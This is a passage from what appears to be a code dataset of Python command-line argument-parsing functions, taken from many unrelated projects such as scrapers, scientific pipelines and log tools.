type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def parse_args():\n parser = argparse.ArgumentParser(description='Crawl an Android app store for apk files.')\n parser.add_argument('--store', dest='api', choices=['GooglePlay', 'F-Droid'], required=True,\n help='Specifies the store to crawl. At the moment only Google Play is supported.')\n parser.add_argument('--meta', dest='meta', required=False, action='store_const', default=False, const=True,\n help='If set, no apps will be downloaded, but the meta_data will be saved.')\n parser.add_argument('--basedir', dest='base_dir', type=str, default=os.getenv('HOME'),\n required=False, help='Specifies the base path for both logs and apk_downloads.')\n parser.add_argument('--credentials', dest='credentials', type=str, required=False, default=None,\n help='Specifies the path to a credential file in .toml format.')\n parser.add_argument('--limit', dest='limit', type=int, required=False, default=None,\n help='Specifies the maximum number of apks per category to download.')\n return parser.parse_args()", "def parse_args():\n from argparse import ArgumentParser\n ap = ArgumentParser(prog=__exe__, description=__purpose__)\n ap.add_argument('session', help='Session Label')\n ap.add_argument('-sd', '--subjects_dir', help='Subjects Dir',\n default='/tmp')\n return ap.parse_args()", "def parse_args():\n\n\t# Define the input parser\n\tdesc = \"computes long term temperature anomaly trend for the GHNC dataset\"\n\tepilog = \"\"\"\ndatarange input argument is of the format:\n\t\t YYYY[MM[DD]][:YYYY[MM[DD]]]\nWhere the date before the optional ':'' represents the lower bound of\nthe range and the optional date after the : represents the upper\nbound. The optional elements of the date default to the lowest possible\nvalue for the lower bound and to the maximum possible for the upper\none. For example,\n\t2006 is equivalent to 2006/01/01:2006/12/31\n\t2006/02 is equivalent to 2006/02/01:2006/02/28\n\"\"\"\n\n\tparser = argparse.ArgumentParser(description=desc, epilog=epilog,\n\t\t\t\t\t\tformatter_class=argparse.RawDescriptionHelpFormatter)\n\tparser.add_argument(\"daterange\",\n\t\t\t\t\t\thelp=\"range of dates to make available locally\")\n\tparser.add_argument('-t',\"--timeseries\",nargs=2,metavar=('lon','lat'),type=float,\n\t\t\t\t\t\thelp=\"plot timeseries for the lon lat pair of coordinates\")\n\tparser.add_argument('-r',\"--recompute\",default=False,action='store_true',\n\t\t\t\t\t\thelp=\"force recompute trend\")\n\n\treturn parser.parse_args()", "def parse_args():\n parser = ArgumentParser()\n parser.add_argument('-t', '--timer', action='store_true', \\\n help='Time the first random generation')\n parser.add_argument('-i', '--ibmq', default='', help='IBMQ token')\n parser.add_argument('-b', '--backend', default='', help='IBMQ backend')\n return parser.parse_args()", "def parseArguments():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Optional arguments\n parser.add_argument(\"-t\", \"--test\", help=\"Optionally test algorithm on subsample of the data. Set to 1 for testing\", type=int, default=0)\n\n parser.add_argument(\"--cores\", help=\"Optimized code for a server with a lot of RAM, set to the number of available cores\", type=int, default=40)\n\n\n # Print version\n parser.add_argument(\"--version\", action=\"version\", version='%(prog)s - Version 2.0') #version 1.0 is for the observations in June 2018\n #version 1.1 contains the optimizations made after the june observations (mainly the switch to stackmags)\n #version 1.2 changed sim class to NOT include the list of failed candidates (not qsos)\n #... copied changes made to crossval version\n #version 1.5 added check for duplicate quasars and remove them\n #version 1.6 new simulated quasars (december)\n ##-------------------\n #version 2.0: combined training of classifier and regressor, streamlined input\n #version 2.1: Tryied to updates excluded area to a little more than stripe 82 but decided not to keep it, so no change\n\n # Parse arguments\n args = parser.parse_args()\n\n return args", "def parse_args(args):\n parser = argparse.ArgumentParser(\n description=\"Lookup table generator for Image Comparison\")\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"lookuptable {ver}\".format(ver=__version__))\n parser.add_argument(\n \"-f\",\n \"--folder\",\n dest=\"imagefolder\",\n help=\"path to image folder\",\n type=str,\n metavar=\"STRING\")\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n dest=\"loglevel\",\n help=\"set loglevel to INFO\",\n action=\"store_const\",\n const=logging.INFO)\n parser.add_argument(\n \"-vv\",\n \"--very-verbose\",\n dest=\"loglevel\",\n help=\"set loglevel to DEBUG\",\n action=\"store_const\",\n const=logging.DEBUG)\n return parser.parse_args(args)", "def parse_arguments(raw_args=sys.argv[1:]):\n parser = optparse.OptionParser(\n usage=\"usage: %prog [OPTIONS] DOMAIN_NAME DOMAIN_CONFIG_FILE\",\n description=\"A tool for provisioning a Khan Academy CloudSearch \"\n \"domain.\")\n\n parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", default=False,\n help=\"If specified, DEBUG messages will be printed and more \"\n \"information will be printed with each log message.\")\n\n parser.add_option(\"--leave-temp-dir\", action=\"store_true\", default=False,\n help=\"If specified, the created temporary directory will not be \"\n \"deleted when the script exits.\")\n\n parser.add_option(\"-n\", \"--dry-run\", action=\"store_true\", default=False,\n help=\"If specified, no commands will actually be executed.\")\n\n parser.add_option(\"--no-reindex\", action=\"store_true\", default=False,\n help=\"If specified, will only update the config, without reindexing.\")\n\n options, args = parser.parse_args(raw_args)\n\n if len(args) != 2:\n parser.error(\"You must specify the name of the domain and a file \"\n \"containing the domain configuration.\")\n\n return (options, args[0], args[1])", "def parse_arguments():\n p = argparse.ArgumentParser(description='Prepare the dataset for use by neural models.')\n p.add_argument(\"json_file\", type=argparse.FileType('r'), help=\"json file with all the data\")\n p.add_argument(\"prefix\", type=str, help=\"prefix for all the generated files\")\n p.add_argument(\"data_type\", type=str, choices=[\"names\", \"comments\", \"nc\"],\n default=\"nc\", help=\"type of the information recorded in the dataset\")\n p.add_argument(\"labels\", type=str, choices=[\"PROG\", \"ALL\", \"TOP\"],\n default=\"PROG\", help=\"method by which to choose the labels for the dataset\")\n p.add_argument(\"-other_label\", type=str, required=False, default=\"\",\n help=\"label to use instead of all infrequent labels. \"\n \"This can be left blank to ignore infrequent labels altogether\")\n p.add_argument(\"-label_num\", type=int, default=100, required=False,\n help=\"Number of most frequent labels to keep. Works with label_choice=TOP\")\n p.add_argument(\"-min_prog_labels\", type=int, default=5, required=False,\n help=\"Minimal number of programs a label has to appear in for it to be included \"\n \"in the dataset. Works with label_choice=PROG\")\n p.add_argument(\"-test_prog_list\", type=argparse.FileType('r'), default=None, required=False,\n help=\"file with the list of programs in the test set (optional)\")\n\n return p.parse_args(sys.argv[1:])", "def parseArgs(args):\n parser = argparse.ArgumentParser(description = \"Scrapes baseball-reference.com for player statistics\")\n\n parser.add_argument(\"-d\", \"--domain\", help=\"domain to scrape for statistics. Default is baseball-reference.com\", nargs=1, default=[\"http://www.baseball-reference.com\"])\n parser.add_argument(\"-f\", \"--filename\", help=\"database file to store data in\", required=True, nargs=1, type=argparse.FileType(\"r+\"))\n parser.add_argument(\"-r\", \"--reset\", help=\"removes database before scraping all data from baseball-reference. Conflicts with -u. One of -r and -u must be specified\", action=\"store_true\")\n parser.add_argument(\"-u\", \"--update\", help=\"scrapes baseball-reference and adds all new information to the database. Conflicts with -r. One of -r and -u must be specified\", action=\"store_true\")\n parser.add_argument(\"--verbose\", help=\"enables verbose output\", action=\"store_true\")\n parser.add_argument(\"--version\", help=\"prints out version and exits\", action=\"version\", version=\"%(prog)s ({version})\".format(version=__version__))\n\n parsedArgs = parser.parse_args()\n\n if parsedArgs.reset == parsedArgs.update:\n parser.error(\"-r and -u are conflicting flags. Exactly one must be specified\")\n parser.print_help()\n\n return parsedArgs", "def parse_cmdline():\n\tparser = ArgumentParser(prog=\"FastP_QC.py\", description=\"\"\"Script collects stats from fastp jsons.\"\"\")\n\tparser.add_argument(\"-r1\", \"--r1_stats\", dest=\"r1_stats\", action=\"store\", required=True, help=\"Text file with r1 stats, from q30.py script.\")\n\tparser.add_argument(\"-r2\", \"--r2_stats\", dest=\"r2_stats\", action=\"store\", required=True, help=\"Text file with r2 stats, from q30.py script.\")\n\tparser.add_argument(\"-n\", \"--name\", dest=\"name\", action=\"store\", required=True, help=\"Sample name\")\n\targs = parser.parse_args()\n\treturn args", "def parse_args():\n parser = argparse.ArgumentParser(\n description='Run the destination IoT program (CTRL-C to exit)')\n\n parser.add_argument('-v',\n '--verbose',\n default=False,\n action='store_true',\n help='Print all debug logs')\n\n parser.add_argument('-p',\n '--port',\n metavar='<port number>',\n default=7777,\n type=int,\n help='Default: 7777')\n\n parser.add_argument('-a',\n '--address',\n metavar='<email_address>',\n nargs='*',\n help='Email address(es) to receive notifications')\n\n args = parser.parse_args()\n return args", "def _ParseArgs():\n usage = \"usage: %prog [options]\"\n parser = optparse.OptionParser(usage=usage)\n\n parser.add_option('--width', type='int',\n default=352,\n help=('Width of the YUV file\\'s frames. '\n 'Default: %default'))\n parser.add_option('--height', type='int', default=288,\n help=('Height of the YUV file\\'s frames. '\n 'Default: %default'))\n parser.add_option('--crop_height', type='int', default=32,\n help=('How much of the top of the YUV file to crop. '\n 'Has to be module of 2. Default: %default'))\n parser.add_option('--yuv_file', type='string',\n help=('The YUV file to be cropped.'))\n parser.add_option('--output_file', type='string', default='output.yuv',\n help=('The output YUV file containing the cropped YUV. '\n 'Default: %default'))\n options = parser.parse_args()[0]\n if not options.yuv_file:\n parser.error('yuv_file argument missing. Please specify input YUV file!')\n return options", "def parse_args(self, args):\n raise Exception(\"Not implemented\")", "def parse_args():\n from argparse import ArgumentParser\n ap = ArgumentParser(prog=__exe__, description=__purpose__)\n ap.add_argument(\n '--host', dest='host', default=None,\n help='Host for XNAT. Default: env XNAT_HOST.')\n ap.add_argument(\n '-u', '--username', dest='username', default=None,\n help='Username for XNAT.')\n ap.add_argument('project', help='Project Label')\n ap.add_argument('session', help='Session Label')\n ap.add_argument(\n 'proc_suffix', help='Proc name suffix', nargs='?', default='')\n ap.add_argument(\n '-sd', '--subjects_dir', dest='subjects_dir',\n help='Subjects Directory',\n default=os.environ.get('SUBJECTS_DIR', '/tmp'))\n return ap.parse_args()", "def parse_args():\n help_text = \"\"\"\n Analyzer of the frequency of use of nouns in the headings of posts on hubr.com\n \"\"\"\n parser = argparse.ArgumentParser(\n description=help_text\n )\n parser.add_argument(\n '-p',\n '--pages',\n type=int,\n dest='page_count',\n default=PAGE_COUNT,\n help=f'Number of pages to parse, default is {PAGE_COUNT}.'\n )\n parser.add_argument(\n '-s',\n '--start',\n type=int,\n default=PAGE_START,\n dest='start_page',\n help=f'Start page number, default is {PAGE_START}.',\n )\n parser.add_argument(\n '-t',\n '--top',\n type=int,\n default=TOP_SIZE,\n dest='top_size',\n help=f'The size of the top noun, default is {TOP_SIZE}.',\n )\n\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input_path\", required=True)\n parser.add_argument(\"-c\", \"--config\", required=True)\n return parser.parse_args()", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='Calculates A and Ea from Gaussian output files using GoodVibes. '\n 'List files to be analyzed, reactant(s) first and ending with the '\n 'transition structure. These can be listed on the command line or in '\n 'a file (each line listing a set of reactant(s) and transition '\n 'structure).')\n parser.add_argument(\"-d\", \"--out_dir\", help=\"A directory where output files should be saved. The default location \"\n \"is the current working directory.\", default=None)\n parser.add_argument(\"-f\", dest=\"freq_cutoff\", help=\"Cut-off frequency for both entropy and enthalpy (wavenumbers) \"\n \"(default = 0)\", default=\"0\")\n parser.add_argument(\"-l\", \"--list\", help=\"The location of the list of Gaussian output files. \"\n \"The default file name.\", default=None)\n parser.add_argument(\"-q\", \"--quasiharmonic\", help=\"Use the '-q' option in GoodVibes, which turns on turns on \"\n \"quasi-harmonic corrections to both entropy and enthalpy in the \"\n \"Gibbs free energy (qh-G(T)) output from GoodVibes. \",\n action='store_true')\n parser.add_argument(\"--temp\", help=\"Temperature in K for calculating \\u0394G. The default is the first \"\n \"temperature in 'temp_range' (if specified). If a value is given, the program \"\n \"will use the temperature closest to it in the temp_range.\", default=None)\n parser.add_argument(\"-ti\", \"--temp_range\", help=\"Initial temp, final temp, (and optionally) step size (K) for \"\n \"thermochemistry calculations. The default range is 300,600,30\",\n default=\"300,600,30\")\n parser.add_argument(\"-v\", \"--vib_scale\", help=\"Scaling factor to be used for vibrational frequencies. If not \"\n \"provided, the GoodVibes default value will be used.\",\n default=None)\n parser.add_argument(\"-p\", \"--plot\", help=\"Make a \\u0394G plot at the specified temp. The default is False.\",\n action='store_true')\n parser.add_argument(\"-pl\", \"--plot_labels\", help=\"Optional labels for \\u0394G plot. Enter as a list.\",\n default=None)\n parser.add_argument(\"-c\", \"--vibes_check\", help=\"In addition to standard checks always run (matching solvent, \"\n \"level of theory, stoichiometry, charge, multiplicity, and \"\n \"Gaussian versions), run files through GoodVibes '--check' before \"\n \"performing calculations. The default is False.\",\n action='store_true')\n parser.add_argument(\"-o\", \"--output_fname\", help=\"The name of the output file to be created. The default is the \"\n \"list name with the extension '.csv', or '{}' if no list name \"\n \"provided.\".format(DEF_OUT_FILE_NAME), default=None)\n\n parser.add_argument(\"-s\", \"--save_vibes\", help=\"Save the output from running GoodVibes in separate files, \"\n \"named with the Gaussian log file prefix and '.dat'. \"\n \"The default is False.\",\n action='store_true')\n parser.add_argument(\"-t\", \"--tog_vibes\", help=\"Save the output from running GoodVibes in one file, \"\n \"renamed with the output file prefix and '.dat'. \"\n \"The default is False.\",\n action='store_true')\n\n args = None\n try:\n args = parser.parse_known_args(argv)\n options = args[0]\n if not options.out_dir:\n options.out_dir = os.getcwd()\n # user can define a new directory as the output directory\n if not os.path.exists(options.out_dir):\n os.makedirs(options.out_dir)\n\n if options.output_fname:\n options.output_fname = os.path.abspath(os.path.join(options.out_dir, options.output_fname))\n elif options.list:\n options.output_fname = create_out_fname(options.list, ext='.csv', base_dir=options.out_dir)\n else:\n options.output_fname = create_out_fname(DEF_OUT_FILE_NAME, ext='.csv', base_dir=options.out_dir)\n\n if options.plot_labels:\n options.plot_labels = options.plot_labels.split(',')\n else:\n options.plot_labels = ['']\n\n if options.vib_scale:\n options.vib_scale = float(options.vib_scale)\n\n except (SystemExit, ValueError) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n\n return args, GOOD_RET", "def parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n # If user doesn't specify an input file, read from standard input. Since\n # encodings are the worst thing, we're explicitly expecting std\n parser.add_argument('-i', '--infile',\n type=lambda x: open(x, encoding=ENCODE_IN),\n default=io.TextIOWrapper(\n sys.stdin.buffer, encoding=ENCODE_IN)\n )\n # Same thing goes with the output file.\n parser.add_argument('-o', '--outfile',\n type=lambda x: open(x, 'w', encoding=ENCODE_OUT),\n default=io.TextIOWrapper(\n sys.stdout.buffer, encoding=ENCODE_OUT)\n )\n # Set the verbosity level for the logger. The `-v` option will set it to\n # the debug level, while the `-q` will set it to the warning level.\n # Otherwise use the info level.\n verbosity = parser.add_mutually_exclusive_group()\n verbosity.add_argument('-v', '--verbose', action='store_const',\n const=logging.DEBUG, default=logging.INFO)\n verbosity.add_argument('-q', '--quiet', dest='verbose',\n action='store_const', const=logging.WARNING)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser('Reading Comprehension on BaiduRC dataset')\n parser.add_argument('--prepare', action='store_true',\n help='create the directories, prepare the vocabulary and embeddings')\n parser.add_argument('--train', action='store_true',\n help='train the model')\n parser.add_argument('--generate', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gentest', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gpu', type=str, default='0',\n help='specify gpu device')\n\n train_settings = parser.add_argument_group('train settings')\n train_settings.add_argument('--optim', default='Adam',\n help='optimizer type')\n train_settings.add_argument('--learning_rate', type=float, default=0.001,\n help='learning rate')\n train_settings.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n train_settings.add_argument('--dropout', type=float, default=0,\n help='dropout keep rate')\n train_settings.add_argument('--batch_size', type=int, default=128,\n help='train batch size')\n train_settings.add_argument('--epochs', type=int, default=10,\n help='train epochs')\n\n model_settings = parser.add_argument_group('model settings')\n model_settings.add_argument('--embed_size', type=int, default=128,\n help='size of the embeddings')\n model_settings.add_argument('--hidden_size', type=int, default=256,\n help='size of LSTM hidden units')\n model_settings.add_argument('--max_seq_len', type=int, default=50,\n help='max passage num in one sample')\n model_settings.add_argument('--max_gen_len', type=int, default=50,\n help='max length of passage')\n\n path_settings = parser.add_argument_group('path settings')\n path_settings.add_argument('--vocab_dir', default='../data/vocab/',\n help='the dir to save vocabulary')\n path_settings.add_argument('--model_dir', default='../data/models/',\n help='the dir to store models')\n path_settings.add_argument('--result_dir', default='../data/results/',\n help='the dir to output the results')\n path_settings.add_argument('--summary_dir', default='../data/summary/',\n help='the dir to write tensorboard summary')\n path_settings.add_argument('--log_path',\n help='path of the log file. If not set, logs are printed to console')\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--zarr_dir',\n type=str,\n help='path to directory of zarr files',\n )\n parser.add_argument(\n '--tiff_dir',\n type=str,\n help='path to directory of tiff files',\n )\n parser.add_argument(\n '--output_dir',\n type=str,\n help='path to directory for writing',\n )\n parser.add_argument(\n '--config_path',\n type=str,\n default=None,\n help='path to yaml preprocess config file',\n )\n \n args = parser.parse_args()\n return args", "def ParseArguments():\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('-f', '--file', help='Text file to be used (e.g. mem/sample_mem.txt)')\n parser.add_argument('--memsize', help='Memory size of generated memory')\n parser.add_argument('--memrange', help='Max range of memory in generated memory')\n parser.add_argument('--mempattern', help='Generated memory pattern focus (normal, loops, rep, random)')\n parser.add_argument('--cachesize', help='Cache size to be used')\n parser.add_argument('--linesize', help='Cache line size to be used')\n parser.add_argument('--mult', help='Run an entered number of simulations back-to-back')\n parser.add_argument('-t', '--test', help='Run tests to verify the simulator is functioning properly', action=\"store_true\")\n\n return parser.parse_args()", "def parse_args():\n p = argparse.ArgumentParser(\n description='Parse system logs, for fun or something')\n p.add_argument('-l', '--log', dest='log_file', help='The log file')\n p.add_argument('-f', '--filter', dest='filter', help='filter by daemon')\n return p.parse_args()", "def parse_args():\r\n desc = \"Check for the longest running requests in bookie\"\r\n parser = argparse.ArgumentParser(description=desc)\r\n\r\n parser.add_argument('-l', '--log', dest='log',\r\n action='store',\r\n default=None,\r\n required=True,\r\n help=\"log file we're reading requests from\")\r\n\r\n parser.add_argument('-n', '--number', dest='count',\r\n action='store',\r\n default=10,\r\n type=int,\r\n required=False,\r\n help=\"how many urls do we wish to see, default 10\")\r\n\r\n\r\n args = parser.parse_args()\r\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse Diff Exp output files\")\n parser.add_argument(\"raw_file\", help=\"DE analysis output file (.tab).\")\n parser.add_argument(\"output_json\", help=\"Output JSON\")\n parser.add_argument(\"output_file\", help=\"Output file\")\n parser.add_argument(\"--gene_id\", help=\"Gene_IDs column name\", type=str)\n parser.add_argument(\"--fdr\", help=\"FDR column name\", type=str)\n parser.add_argument(\"--pvalue\", help=\"Pvalue column name\", type=str)\n parser.add_argument(\"--fwer\", help=\"FWER column name\", type=str)\n parser.add_argument(\"--logodds\", help=\"Log Odds column name\", type=str)\n parser.add_argument(\"--logfc\", help=\"logfc column name\", type=str)\n parser.add_argument(\"--stat\", help=\"Statistics column name\", type=str)\n return parser.parse_args()", "def arg_parse():\n p = ap.ArgumentParser()\n p.add_argument('infile',\n help='path to file containing objects')\n p.add_argument('n1',\n help='night 1')\n p.add_argument('n2',\n help='night 2')\n p.add_argument('observatory',\n help='Astropy name of observatory')\n return p.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", dest=\"input_file\", help=\"input file or pattern\", default=\"\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output_file\", help=\"output file or pattern\", default=\"\")\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action='store_true')\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", action='store_true')\n parser.set_defaults(verbose=False)\n parser.set_defaults(debug=False)\n return parser.parse_args()", "def parse(self, command_line=sys.argv[1:]):\n return self._parser.parse_args(command_line)", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file\", help=\"file with the cohort you want to check / fix\", type=str, required=True)\n parser.add_argument(\"-o\", \"--outdir\", help=\"where should the files and the result readme be stored?\", type=str, required=True)\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-i\", \"--input\", required=True, action=\"store\", dest=\"f_in\", help=\"input file\"\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n required=True,\n action=\"store\",\n dest=\"f_out\",\n help=\"stem of output file\",\n )\n\n parser.add_argument(\n \"-d\",\n \"--dir\",\n required=True,\n action=\"store\",\n dest=\"dir\",\n help=\"directory to save output files\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--threshold\",\n required=False,\n action=\"store\",\n dest=\"thres\",\n default=0.85,\n help=\"threshold for the scoring function\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--language\",\n required=True,\n action=\"store\",\n dest=\"lang\",\n help=\"provide language in order to set stop words\",\n )\n\n parser.add_argument(\n \"-min\",\n \"--minimum\",\n required=False,\n action=\"store\",\n dest=\"min\",\n default=100,\n help=\"minimum number of occurrences to be considered as ngram\",\n )\n\n parser.add_argument(\n \"--trigram\",\n required=False,\n action=\"store_true\",\n dest=\"trigram\",\n help=\"extracting trigrams in addition to bigrams\",\n )\n\n return parser.parse_args()", "def parse_args():\n global Args\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n pars_simulation(subparsers)\n pars_analyze(subparsers)\n Args = parser.parse_args()", "def parse_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"生成用户字符串识别的切分字符串\"\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"output/\"\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\",\n required=True\n )\n parser.add_argument(\n \"-mi\",\n \"--min_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The minimum number of characters per line, Default is 3.\",\n default=3,\n\n )\n parser.add_argument(\n \"-ma\",\n \"--max_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The maximum number of characters per line, Default is 20.\",\n default=20,\n )\n return parser.parse_args()", "def parse_args(args):\n\n parser = argparse.ArgumentParser(\n description=\"\"\"Generates and runs an afni_proc.py script to preprocess resting state fMRI data\"\"\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n # Optional Flags\n parser.add_argument(\"-t\", \"--trs_remove\", action=\"store\", default=5, type=int, metavar='TRs',\n help=\"\"\"number of trs to remove at the beginning of the epi data\n (default = 5 trs)\"\"\")\n parser.add_argument(\"-d\", \"--dim_voxel\", action=\"store\", default=2.0, type=float, metavar='MM',\n help=\"voxel dimensions in mm that processed epi will be resampled to (default = 2.0 mm)\")\n parser.add_argument(\"-b\", \"--bandpass\", action=\"store\", default=[0.01, 0.25], nargs=2, type=float, metavar=\"F\",\n help=\"bandpass frequencies lower and upper limits (default = 0.01 0.25)\")\n parser.add_argument(\"-v\", \"--volumes\", action=\"store\", default=0, type=int, metavar=\"V\",\n help=\"\"\"truncate the epi data to the inputted number of volumes, useful if subjects have data \n with different numbers of volumes (default = no truncation)\"\"\")\n parser.add_argument(\"-f\", \"--fwhm\", action=\"store\", default=5.0, type=float, metavar=\"MM\",\n help=\"the full width half maximum that is used when blurring (default = 5.0 mm)\")\n parser.add_argument(\"-c\", \"--cores\", action=\"store\", default=cpu_count(), type=int, metavar=\"C\",\n help=\"number of cores supplied to 3dDeconvolve (default = all cores)\")\n parser.add_argument(\"-s\", \"--subj_id\", action=\"store\", default=\"sub\", metavar=\"SUB\",\n help=\"text file of subject ids (default = sub)\")\n parser.add_argument(\"-T\", \"--time_step\", action=\"store\", default=0, type=float, metavar=\"TS\",\n help=\"set the time step for bandpassing (default = ts in header info\")\n\n parser.add_argument(\"-g\", \"--global_signal_regression\", action=\"store_false\", default=True,\n help=\"do not perform global signal regression (default = perform gsr)\")\n\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", default=False,\n help=\"\"\"rerun preprocessing, override and delete previous results in \n 'Processed' folder (default = don't override)\"\"\")\n parser.add_argument(\"-m\", \"--motion_param\", action=\"store_true\", default=False,\n help=\"use 12 motion parameters for regression (default = 6 motion parameters)\")\n parser.add_argument(\"-G\", \"--gm_blur\", action=\"store_true\", default=False,\n help=\"blur only in grey matter mask (default = blur in whole brain)\")\n parser.add_argument(\"-n\", \"--nl_reg\", action=\"store_true\", default=False,\n help=\"use non-linear warp between anatomical and MNI template (default = linear warp)\")\n\n # Required Inputs\n required = parser.add_argument_group(\"required arguments\")\n required.add_argument(\"-e\", \"--epi\", action=\"store\", required=True,\n help=\"text file of paths to raw epi data\")\n required.add_argument(\"-a\", \"--anat\", action=\"store\", required=True,\n help=\"text file of paths to raw anatomical data\")\n required.add_argument(\"-o\", \"--out_dir\", action=\"store\", required=True, metavar=\"OUT\",\n help=\"text file of paths to output directory\")\n result = parser.parse_args(args)\n\n # Make sure inputted parameters are legal\n assert (os.path.isfile(result.epi)), \"{} does not exist or is not a file\".format(result.epi)\n assert (os.path.isfile(result.anat)), \"{} does not exist or is not a file\".format(result.ant)\n assert (result.trs_remove >= 0), \"Cannot remove negative trs\"\n assert (result.dim_voxel >= 0), \"Cannot have a negative voxel dimension\"\n assert (np.all(np.array(result.bandpass) > 0)), \"Cannot have a negative frequency limit for bandpassing\"\n assert (result.volumes > -1), \"Number of volumes must be greater than 0\"\n assert (result.cores > 0), \"Number of cores used must be greater than 0\"\n assert (result.time_step > -1), \"Time step must be greater than 0\"\n\n return result", "def _parseArgs():\n # HINT: If you consider adding an option,\n # please consider adding a config file option first.\n parser = ArgumentParser(description=STRING_USAGE_DESCRIPTION,\n epilog=STRING_USAGE_EPILOG)\n parser.add_argument('--version', action='version',\n version='%(prog)s (' + VERSIONSTRING + ')')\n parser.add_argument('-c', '--configfile', action='store',\n dest='configfile',\n default=DEFAULT_CONFIGFILE,\n help=STRING_USAGE_CONFIGFILE)\n parser.add_argument('-e', '--editconfig', action='store_true',\n dest='invoke_editconfig',\n default=False,\n help=STRING_USAGE_EDITCONFIG)\n parser.add_argument('--defaultconfig', action='store_true',\n dest='invoke_defaultconfig',\n default=False,\n help=STRING_USAGE_DEFAULTCONFIG)\n parser.add_argument('--printconfig', action='store_true',\n dest='invoke_printconfig',\n default=False,\n help=STRING_USAGE_PRINTCONFIG)\n _addOverwriteBool(parser, 'gui', 'gui', 'enable')\n parser.add_argument('-s', '--sources', section='wesen',\n dest='sources',\n action=_OverwriteConfigAction)\n parser.add_argument('-r', '--resume',\n dest='resume', action='store_true',\n default=False, help=STRING_USAGE_RESUME)\n return parser.parse_known_args()", "def parse_arguments():\n #usage = \"usage: %(prog)s [options] <message file>\" + DESCRIPTION\n parser = ArgumentParser()\n parser.add_argument('-v', '--version', action='version', version=VERSION)\n parser.add_argument('source', metavar='source', help='input logfile or directory with logfiles')\n\n \"\"\"\n parser.add_argument('-m', '--mat-id', metavar='string', # or stare_false\n dest=\"id_mat\", default='', # negative store value\n help=\"material id to grep\")\n parser.add_argument('-c', '--count', metavar='N', type=int, # or stare_false\n dest=\"count\", default=0, # negative store value\n help=\"count\")\n parser.add_argument('-p', '--pattern', metavar='string', # or stare_false\n dest=\"pattern\", default='xxx', # negative store value\n help=\"search pattern within logfile\")\n \"\"\"\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Helps analyze articles.')\n parser.add_argument('--config', default='config.yaml',\n help='Configuration file for the options of this script')\n parser.add_argument('--search', default=None, type=str,\n help='Search for text in the articles')\n parser.add_argument('--case-sensitive', action='store_true',\n help='Makes search case-senstive (only applicatble to --search)')\n parser.add_argument('--list', default=None, type=str,\n help='List [title|authors|date|word-count|author|excerpt|content] of the articles')\n parser.add_argument('--sort', action='store_true',\n help='Sorts output (only applicable to --list).')\n parser.add_argument('--sort-by', default=None, type=str,\n help='Sorts output by another attribute [title|author|date] (only applicable to --list)')\n parser.add_argument('--statistics', action='store_true',\n help='Gives basic statistics about the articles.')\n parser.add_argument('--count-articles', action='store_true',\n help='Counts the total number of articles')\n parser.add_argument('--count-words', action='store_true',\n help='Counts the total number of words')\n parser.add_argument('--count-paragraphs', action='store_true',\n help='Counts the total number of paragraphs')\n parser.add_argument('--count-by-author', action='store_true',\n help='Counts the number of articles by each author')\n parser.add_argument('--count-by-year', action='store_true',\n help='Counts the number of articles bucketed by year')\n parser.add_argument('--count-by-months', default=None, type=int,\n help='Counts the number of articles bucketed by number of months')\n \n return parser, parser.parse_args()", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser(\n description=\"Convert dependency files into list of GitHub links.\",\n epilog=\"For help with this program, contact John Speed at jmeyers@iqt.org.\",\n )\n parser.add_argument(\n \"--python\",\n default=False, # default value is False\n help=\"Convert requirements.txt file into GitHub links.\",\n )\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse library type information.\")\n parser.add_argument(\"input_file\", help=\"Salmon library type information file.\")\n return parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description='Pure-python command-line calculator.')\n\n parser.add_argument('EXPRESSION', action=\"store\", type=str, help=\"expression string to evaluate\")\n 